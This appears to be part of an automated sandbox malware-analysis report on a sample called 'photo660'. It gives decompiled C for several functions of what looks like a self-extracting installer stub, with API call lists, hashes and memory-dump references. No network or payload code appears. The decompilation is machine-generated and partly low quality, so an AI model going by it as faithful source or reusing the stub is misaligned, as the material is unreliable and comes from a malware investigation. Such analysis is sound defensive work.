                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212dd5
                                                                                                                                                                                                        0x00212dde
                                                                                                                                                                                                        0x00212de3
                                                                                                                                                                                                        0x00212e04
                                                                                                                                                                                                        0x00212e0a
                                                                                                                                                                                                        0x00212e10
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212e10
                                                                                                                                                                                                        0x00212dd3
                                                                                                                                                                                                        0x00212dbb
                                                                                                                                                                                                        0x00212da1
                                                                                                                                                                                                        0x00212d5b
                                                                                                                                                                                                        0x00212d5b
                                                                                                                                                                                                        0x00212d5d
                                                                                                                                                                                                        0x00212d69
                                                                                                                                                                                                        0x00212d6e
                                                                                                                                                                                                        0x00212f06
                                                                                                                                                                                                        0x00212f06
                                                                                                                                                                                                        0x00212f06
                                                                                                                                                                                                        0x00212d59
                                                                                                                                                                                                        0x00212f18

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212CF9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00212D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00212D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00212DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00212DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(photo660,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00212E0A
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$photo660
                                                                                                                                                                                                        • API String ID: 1002816675-3055790139
                                                                                                                                                                                                        • Opcode ID: 4cf819d26d5aadfa0b36eee88c14ea8037102706659f4322d6a0b8e581da6ef6
                                                                                                                                                                                                        • Instruction ID: 410c3ef8402eb3792c112d3d9569364a03375c2b21afe552af5314df0c49f4ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cf819d26d5aadfa0b36eee88c14ea8037102706659f4322d6a0b8e581da6ef6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD51D470770302EBE724AB20AC5EBFB36D9DB76700F108035BA45D61D1DEB498F98A15
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002134F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E002134F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x2191d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x218584 = _t35;
					E002143D0(_t35, GetDesktopWindow());
					__eflags =  *0x218184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "photo660");
					_t17 = CreateThread(0, 0, E00214FE0, 0, 0, 0x218798);
					 *0x21879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E002144B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x21858c);
					_t38 =  *0x218584; // 0x0
					_t25 = E002144B9(_t38, 0x4b2, 0x211140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x2191d8 = 1;
						SetEvent( *0x21858c);
						_t39 =  *0x21879c; // 0x0
						E00213680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x21858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x21879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                        0x002134fb
                                                                                                                                                                                                        0x002134fe
                                                                                                                                                                                                        0x00213665
                                                                                                                                                                                                        0x00213666
                                                                                                                                                                                                        0x00213666
                                                                                                                                                                                                        0x00213668
                                                                                                                                                                                                        0x0021366e
                                                                                                                                                                                                        0x0021366e
                                                                                                                                                                                                        0x00213671
                                                                                                                                                                                                        0x00213671
                                                                                                                                                                                                        0x00213677
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213677
                                                                                                                                                                                                        0x00213504
                                                                                                                                                                                                        0x00213506
                                                                                                                                                                                                        0x00213507
                                                                                                                                                                                                        0x0021350c
                                                                                                                                                                                                        0x0021365b
                                                                                                                                                                                                        0x0021365f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213661
                                                                                                                                                                                                        0x00213512
                                                                                                                                                                                                        0x00213515
                                                                                                                                                                                                        0x002135be
                                                                                                                                                                                                        0x002135c1
                                                                                                                                                                                                        0x002135d1
                                                                                                                                                                                                        0x002135d8
                                                                                                                                                                                                        0x002135de
                                                                                                                                                                                                        0x002135f8
                                                                                                                                                                                                        0x00213617
                                                                                                                                                                                                        0x00213617
                                                                                                                                                                                                        0x00213623
                                                                                                                                                                                                        0x00213637
                                                                                                                                                                                                        0x0021363d
                                                                                                                                                                                                        0x00213642
                                                                                                                                                                                                        0x00213644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213646
                                                                                                                                                                                                        0x00213652
                                                                                                                                                                                                        0x00213657
                                                                                                                                                                                                        0x00213658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213658
                                                                                                                                                                                                        0x00213644
                                                                                                                                                                                                        0x0021351b
                                                                                                                                                                                                        0x0021351d
                                                                                                                                                                                                        0x0021354f
                                                                                                                                                                                                        0x00213553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021355f
                                                                                                                                                                                                        0x00213565
                                                                                                                                                                                                        0x0021357c
                                                                                                                                                                                                        0x00213581
                                                                                                                                                                                                        0x00213584
                                                                                                                                                                                                        0x0021359b
                                                                                                                                                                                                        0x002135a1
                                                                                                                                                                                                        0x002135a7
                                                                                                                                                                                                        0x002135ad
                                                                                                                                                                                                        0x002135b3
                                                                                                                                                                                                        0x002135b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002135b8
                                                                                                                                                                                                        0x00213586
                                                                                                                                                                                                        0x00213588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213590
                                                                                                                                                                                                        0x00213524
                                                                                                                                                                                                        0x00213535
                                                                                                                                                                                                        0x00213541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00213535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00213541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 0021355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00211140,00000000,00000020,00000004), ref: 00213590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002135C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 002135F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 002135F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00213610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00213617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00213623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00213637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00213671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 2406144884-1757243477
                                                                                                                                                                                                        • Opcode ID: a37c7eec539e6f23832a9aaf4170c7799e63e1f62941e22e7195ebce29960a95
                                                                                                                                                                                                        • Instruction ID: 4639288198f8b987b7a97ca2555fcc7c703494a699d3dfb2056ae99098ca6c2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a37c7eec539e6f23832a9aaf4170c7799e63e1f62941e22e7195ebce29960a95
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C310B74260341BBD7209F25FC4DEE63AEBE7B9B10F508429F609912E0CF7589A0CB55
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00214224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E002144B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x2188c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x2187a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x218598;
					_v36 = 1;
					_v32 = E00214200;
					_v28 = 0x2188c0;
					 *0x21a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x21a288(_t32, 0x2188c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x2188c0 != 0) {
							E00211680(0x2187a0, 0x104, 0x2188c0);
						}
						 *0x21a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x2187a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x2188c0);
					_t61 = 0x2188c0;
					_t4 =  &(_t61[1]); // 0x2188c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x2188c0; // 0x431181
					_t44 = CharPrevA(0x2188c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x2188c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                        0x00214234
                                                                                                                                                                                                        0x0021423c
                                                                                                                                                                                                        0x00214240
                                                                                                                                                                                                        0x002143b2
                                                                                                                                                                                                        0x002143b7
                                                                                                                                                                                                        0x002143c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002143c5
                                                                                                                                                                                                        0x0021424c
                                                                                                                                                                                                        0x00214252
                                                                                                                                                                                                        0x00214257
                                                                                                                                                                                                        0x002143a4
                                                                                                                                                                                                        0x002143a5
                                                                                                                                                                                                        0x002143ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002143ab
                                                                                                                                                                                                        0x00214263
                                                                                                                                                                                                        0x00214269
                                                                                                                                                                                                        0x0021426e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021427a
                                                                                                                                                                                                        0x00214280
                                                                                                                                                                                                        0x00214285
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021428d
                                                                                                                                                                                                        0x00214293
                                                                                                                                                                                                        0x002142e6
                                                                                                                                                                                                        0x002142e9
                                                                                                                                                                                                        0x002142ef
                                                                                                                                                                                                        0x002142f4
                                                                                                                                                                                                        0x002142f7
                                                                                                                                                                                                        0x00214300
                                                                                                                                                                                                        0x00214307
                                                                                                                                                                                                        0x0021430e
                                                                                                                                                                                                        0x00214315
                                                                                                                                                                                                        0x0021431c
                                                                                                                                                                                                        0x00214322
                                                                                                                                                                                                        0x00214326
                                                                                                                                                                                                        0x0021432d
                                                                                                                                                                                                        0x0021432d
                                                                                                                                                                                                        0x0021432f
                                                                                                                                                                                                        0x00214334
                                                                                                                                                                                                        0x00214343
                                                                                                                                                                                                        0x00214349
                                                                                                                                                                                                        0x0021434d
                                                                                                                                                                                                        0x00214354
                                                                                                                                                                                                        0x00214354
                                                                                                                                                                                                        0x0021435d
                                                                                                                                                                                                        0x0021436e
                                                                                                                                                                                                        0x0021436e
                                                                                                                                                                                                        0x0021437d
                                                                                                                                                                                                        0x00214383
                                                                                                                                                                                                        0x00214387
                                                                                                                                                                                                        0x0021438e
                                                                                                                                                                                                        0x0021438e
                                                                                                                                                                                                        0x00214387
                                                                                                                                                                                                        0x00214391
                                                                                                                                                                                                        0x00214399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214295
                                                                                                                                                                                                        0x0021429f
                                                                                                                                                                                                        0x002142a5
                                                                                                                                                                                                        0x002142aa
                                                                                                                                                                                                        0x002142aa
                                                                                                                                                                                                        0x002142ad
                                                                                                                                                                                                        0x002142ad
                                                                                                                                                                                                        0x002142af
                                                                                                                                                                                                        0x002142b0
                                                                                                                                                                                                        0x002142b6
                                                                                                                                                                                                        0x002142c2
                                                                                                                                                                                                        0x002142c8
                                                                                                                                                                                                        0x002142ce
                                                                                                                                                                                                        0x002142e4
                                                                                                                                                                                                        0x002142e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002142ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00214236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0021424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00214263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0021427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,002188C0,?,00000001), ref: 0021429F
                                                                                                                                                                                                        • CharPrevA.USER32(002188C0,00431181,?,00000001), ref: 002142C2
                                                                                                                                                                                                        • CharPrevA.USER32(002188C0,00000000,?,00000001), ref: 002142D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00214391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 002143A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 5764c03c5838bcae2de4d0504f4ae937002cb7069cc3ba308ea67ebe1abbfc3a
                                                                                                                                                                                                        • Instruction ID: 847403d4741ee8e3abe7f6d8c267b6491a37db2c20386ca2ca180f1c0508b492
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5764c03c5838bcae2de4d0504f4ae937002cb7069cc3ba308ea67ebe1abbfc3a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57412A74A11209AFD7117F60ECC8AED7BF4EB7A344F254069E949A3251CF748C92C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00212773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00212773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x218004; // 0x58ac7c6d
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00211781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0021658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0021658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x211140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00211680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00216CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                        0x00212773
                                                                                                                                                                                                        0x0021277e
                                                                                                                                                                                                        0x00212785
                                                                                                                                                                                                        0x0021278a
                                                                                                                                                                                                        0x0021278d
                                                                                                                                                                                                        0x00212790
                                                                                                                                                                                                        0x00212792
                                                                                                                                                                                                        0x00212798
                                                                                                                                                                                                        0x0021279d
                                                                                                                                                                                                        0x002128b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002127a3
                                                                                                                                                                                                        0x002127a3
                                                                                                                                                                                                        0x002127af
                                                                                                                                                                                                        0x002127c2
                                                                                                                                                                                                        0x002127c8
                                                                                                                                                                                                        0x002127cd
                                                                                                                                                                                                        0x002127d5
                                                                                                                                                                                                        0x002128b7
                                                                                                                                                                                                        0x002128b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002127db
                                                                                                                                                                                                        0x002127dd
                                                                                                                                                                                                        0x002128aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002127e3
                                                                                                                                                                                                        0x002127e3
                                                                                                                                                                                                        0x002127ec
                                                                                                                                                                                                        0x002127f8
                                                                                                                                                                                                        0x00212803
                                                                                                                                                                                                        0x0021280b
                                                                                                                                                                                                        0x00212831
                                                                                                                                                                                                        0x002128c3
                                                                                                                                                                                                        0x002128c9
                                                                                                                                                                                                        0x002128cd
                                                                                                                                                                                                        0x00212837
                                                                                                                                                                                                        0x0021285a
                                                                                                                                                                                                        0x0021285c
                                                                                                                                                                                                        0x00212865
                                                                                                                                                                                                        0x00212892
                                                                                                                                                                                                        0x00212895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212867
                                                                                                                                                                                                        0x00212878
                                                                                                                                                                                                        0x0021288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021287a
                                                                                                                                                                                                        0x00212880
                                                                                                                                                                                                        0x00212885
                                                                                                                                                                                                        0x00212897
                                                                                                                                                                                                        0x00212899
                                                                                                                                                                                                        0x00212899
                                                                                                                                                                                                        0x00212878
                                                                                                                                                                                                        0x00212865
                                                                                                                                                                                                        0x002128a0
                                                                                                                                                                                                        0x002128bf
                                                                                                                                                                                                        0x002128c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002128c1
                                                                                                                                                                                                        0x00212831
                                                                                                                                                                                                        0x002127dd
                                                                                                                                                                                                        0x002127d5
                                                                                                                                                                                                        0x002128e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(58AC7C6D,00000000,00000000,00000000), ref: 002127A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 002127B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 002127BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00212870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002128A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 002128AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 002128B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 002127E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: fc163e2699fd99fc968f3c439e84810396bfb782e3508b71d9c06224f94e5d02
                                                                                                                                                                                                        • Instruction ID: 913e72c70d8f263b915cc4c9b624bca9aa22d786f7cc9d9ee09843efda84ff60
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc163e2699fd99fc968f3c439e84810396bfb782e3508b71d9c06224f94e5d02
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B419371A1012CABDB249F649C89AFA77FDEB79700F1140A5F549E2100DB704EE58FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

